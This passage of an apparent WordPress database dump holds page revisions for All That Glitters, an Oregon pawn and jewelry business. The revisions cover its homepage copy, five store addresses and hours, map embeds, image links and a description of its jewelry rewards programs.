That Glitters, there are no gimmicks, just good business.\n[/one_third]\n[/row_fluid]\n<h2><strong>Oregon Locations</strong></h2>\n<h4>[row]\n[span1][/span1]\n<strong>[span2]Portland</strong>\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\n503-761-9699[/span2]\n<strong>[span2]N. Portland</strong>\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\n503-247-1019[/span2]\n<strong>[span2]Tigard</strong>\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\n503-968-9510[/span2]\n<strong>[span2]Milwaukie</strong>\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\n503-785-1168[/span2]\n<strong>[span2]Salem</strong>\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\n503-362-9939[/span2]\n[span1][/span1]\n[/row]</h4>\n \n\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Visit any one of our 5 Po','Home','','inherit','open','open','','48-autosave-v1','','','2015-03-10 16:05:13','2015-03-10 23:05:13','',48,'http://atgjewelry.com/fuze7/48-autosave-v1/',0,'revision','',0),(127,2,'2015-02-25 09:28:41','2015-02-25 17:28:41','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n<p style=\"text-align: center;\">[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]</p>\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h3>[row]\r\n[span1][/span1]\r\n<strong>[span2]North Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]SouthEast Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h3>','Home','','inherit','open','open','','48-revision-v1','','','2015-02-25 09:28:41','2015-02-25 17:28:41','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(126,2,'2015-02-25 09:25:52','2015-02-25 17:25:52','<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2>Locations</h2>\r\n<h3><strong>[row]</strong>\r\n<strong> [span1][/span1]</strong>\r\n<strong> [span2]Portland, Oregon</strong>\r\n<strong> 2932 N. Lombard</strong>\r\n<strong> 503-247-1019[/span2]</strong>\r\n<strong> [span2]Portland, Oregon</strong>\r\n<strong> 12200 SE Division</strong>\r\n<strong> 503-761-9699[/span2]</strong>\r\n<strong> [span2]Milwaukie, Oregon</strong>\r\n<strong> 15114 SE McLoughlin</strong>\r\n<strong> 503-785-1168[/span2]</strong>\r\n<strong> [span2]Tigard, Oregon</strong>\r\n<strong> 12760 SW Pacific Hwy</strong>\r\n<strong> 503-968-9510[/span2]</strong>\r\n<strong> [span2]Salem, Oregon</strong>\r\n<strong> 1191 Lancaster Dr NE</strong>\r\n<strong> 503-362-9939[/span2]</strong>\r\n<strong> [span1][/span1]</strong>\r\n<strong> [/row]</strong></h3>','Home','','inherit','open','open','','48-revision-v1','','','2015-02-25 09:25:52','2015-02-25 17:25:52','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(128,2,'2015-02-25 09:30:23','2015-02-25 17:30:23','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n<p style=\"text-align: center;\">[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]</p>\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h3>[row]\r\n[span1][/span1]\r\n<strong>[span2]N. Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]S.E. Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h3>','Home','','inherit','open','open','','48-revision-v1','','','2015-02-25 09:30:23','2015-02-25 17:30:23','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(129,2,'2015-02-25 09:32:20','2015-02-25 17:32:20','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n<p style=\"text-align: center;\">[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]</p>\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]N. Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]S.E. Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>','Home','','inherit','open','open','','48-revision-v1','','','2015-02-25 09:32:20','2015-02-25 17:32:20','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(130,2,'2015-02-25 09:35:42','2015-02-25 17:35:42','<h1 style=\"text-align: center;\"><strong>5 LOCATIONS, OPEN 7 DAYS A WEEK!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-25 09:35:42','2015-02-25 17:35:42','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(133,1,'2015-02-26 09:11:45','2015-02-26 17:11:45','Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-26 09:11:45','2015-02-26 17:11:45','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(132,1,'2015-02-26 09:10:41','2015-02-26 17:10:41','[banner img=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Alpina-Extreme-Diver-1024x682.jpg\" title=\"Title\" text=\"Lorem Ipsum\" target=\"_self\"]Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-26 09:10:41','2015-02-26 17:10:41','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(134,1,'2015-02-26 09:23:09','2015-02-26 17:23:09','[cherry_parallax image=\"wp-content/uploads/../../image.jpg\" width=\"1920\" speed=\"2\" custom_class=\"custom-class\"]Text[/cherry_parallax]\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\n\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\n\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\n\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\n\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\n\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.','Jewelry','','inherit','open','open','','39-autosave-v1','','','2015-02-26 09:23:09','2015-02-26 17:23:09','',39,'http://atgjewelry.com/fuze7/39-autosave-v1/',0,'revision','',0),(236,2,'2015-03-10 16:29:27','2015-03-10 23:29:27','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\n[/one_half]\r\n[one_half]\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.\r\n[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-03-10 16:29:27','2015-03-10 23:29:27','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(135,1,'2015-02-26 09:24:04','2015-02-26 17:24:04','[cherry_parallax image=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Alpina-Extreme-Diver-1024x682-1024x588.jpg\" width=\"1920\" speed=\"2\" custom_class=\"custom-class\"]Text[/cherry_parallax]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-26 09:24:04','2015-02-26 17:24:04','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(136,1,'2015-03-09 13:53:15','2015-03-09 20:53:15','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\n[span4]\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\n\n[/span4]\n[span4]\n\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\n[/span4]\n[span4]\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\n[/span4]\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\n[span4]\n\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\n[span4]\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\n[/span4]\n[span4]\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\n[/span4]\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\n[span4]\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\n[/span4]\n[span4]\n\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\n[span4]\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\n[/span4]\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\n[span4]\n\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg\"><img class=\"alignnone size-medium wp-image-165\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\n[span4]\n\n[/span4]\n[span4]\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\n[/span4]\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\n[span4]\n\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\n\n[/span4]\n[span4]\n\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\n\n[/span4]\n[span4]\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\n[/span4]','Locations','','inherit','open','open','','83-autosave-v1','','','2015-03-09 13:53:15','2015-03-09 20:53:15','',83,'http://atgjewelry.com/fuze7/83-autosave-v1/',0,'revision','',0),(137,1,'2015-02-26 09:29:19','2015-02-26 17:29:19','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4][caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a 